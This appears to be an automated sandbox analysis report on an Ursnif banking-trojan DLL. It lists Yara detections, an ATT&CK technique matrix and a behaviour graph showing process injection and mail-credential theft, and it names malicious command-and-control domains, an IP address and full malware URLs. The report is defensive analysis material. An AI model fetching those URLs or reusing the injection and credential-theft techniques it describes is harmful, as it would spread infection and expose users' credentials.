                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsNative API1Valid Accounts1Valid Accounts1DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1Rootkit4Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsPowerShell1Logon Script (Mac)Process Injection913Masquerading1NTDSSystem Information Discovery46Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection913Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery2Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 498359 Sample: data.dll Startdate: 07/10/2021 Architecture: WINDOWS Score: 100 123 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->123 125 Multi AV Scanner detection for domain / URL 2->125 127 Found malware configuration 2->127 129 13 other signatures 2->129 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 1 2->12         started        15 mshta.exe 19 2->15         started        process3 dnsIp4 159 Suspicious powershell command line found 9->159 17 powershell.exe 9->17         started        99 art.microsoftsofymicrosoftsoft.at 194.147.86.221, 49776, 49777, 49778 NETRACK-ASRU Russian Federation 12->99 101 init.icecreambob.com 12->101 161 Writes to foreign memory regions 12->161 163 Writes or reads registry keys via WMI 12->163 165 Writes registry values via WMI 12->165 21 cmd.exe 1 12->21         started        23 rundll32.exe 12->23         started        25 control.exe 12->25         started        29 2 other processes 12->29 27 powershell.exe 15->27         started        signatures5 process6 file7 81 C:\Users\user\AppData\...\a52acufz.cmdline, UTF-8 17->81 dropped 131 Injects code into the Windows Explorer (explorer.exe) 17->131 133 Writes to foreign memory regions 17->133 135 Modifies the context of a thread in another process (thread injection) 17->135 137 Compiles code for process injection (via .Net compiler) 17->137 31 explorer.exe 17->31 injected 35 csc.exe 17->35         started        38 csc.exe 17->38         started        40 conhost.exe 17->40         started        42 rundll32.exe 21->42         started        139 System process connects to network (likely due to code injection or exploit) 23->139 141 Writes registry values via WMI 23->141 44 rundll32.exe 25->44         started        83 C:\Users\user\AppData\Local\...\keehvxm3.0.cs, UTF-8 27->83 dropped 143 Maps a DLL or memory area into another process 27->143 145 Creates a thread in another existing process (thread injection) 27->145 46 csc.exe 27->46         started        48 csc.exe 27->48         started        50 conhost.exe 27->50         started        signatures8 process9 dnsIp10 103 art.microsoftsofymicrosoftsoft.at 31->103 107 System process connects to network (likely due to code injection or exploit) 31->107 109 Tries to steal Mail credentials (via file access) 31->109 111 Changes memory attributes in foreign processes to executable or writable 31->111 121 3 other signatures 31->121 52 cmd.exe 31->52         started        55 cmd.exe 31->55         started        57 RuntimeBroker.exe 31->57 injected 69 3 other processes 31->69 85 C:\Users\user\AppData\Local\...\a52acufz.dll, PE32 35->85 dropped 59 cvtres.exe 35->59         started        87 C:\Users\user\AppData\Local\...\ddwuzigh.dll, PE32 38->87 dropped 61 cvtres.exe 38->61         started        105 init.icecreambob.com 42->105 113 Writes to foreign memory regions 42->113 115 Allocates memory in foreign processes 42->115 117 Modifies the context of a thread in another process (thread injection) 42->117 63 control.exe 42->63         started        89 C:\Users\user\AppData\Local\...\aixojixg.dll, PE32 46->89 dropped 65 cvtres.exe 46->65         started        91 C:\Users\user\AppData\Local\...\keehvxm3.dll, PE32 48->91 dropped 67 cvtres.exe 48->67         started        file11 119 May check the online IP address of the machine 103->119 signatures12 process13 signatures14 147 Uses nslookup.exe to query domains 52->147 71 nslookup.exe 52->71         started        75 conhost.exe 52->75         started        77 conhost.exe 55->77         started        149 Changes memory attributes in foreign processes to executable or writable 63->149 151 Writes to foreign memory regions 63->151 153 Allocates memory in foreign processes 63->153 155 3 other signatures 63->155 79 rundll32.exe 63->79         started        process15 dnsIp16 93 222.222.67.208.in-addr.arpa 71->93 95 resolver1.opendns.com 71->95 97 myip.opendns.com 71->97 157 May check the online IP address of the machine 71->157 signatures17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      data.dll7%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.5d0000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.2.rundll32.exe.4a70000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      init.icecreambob.com3%VirustotalBrowse
                      art.microsoftsofymicrosoftsoft.at10%VirustotalBrowse
                      222.222.67.208.in-addr.arpa2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm100%Avira URL Cloudmalware
                      http://ns.adobe.co/xa0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT100%Avira URL Cloudmalware
                      http://ns.adobp/0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
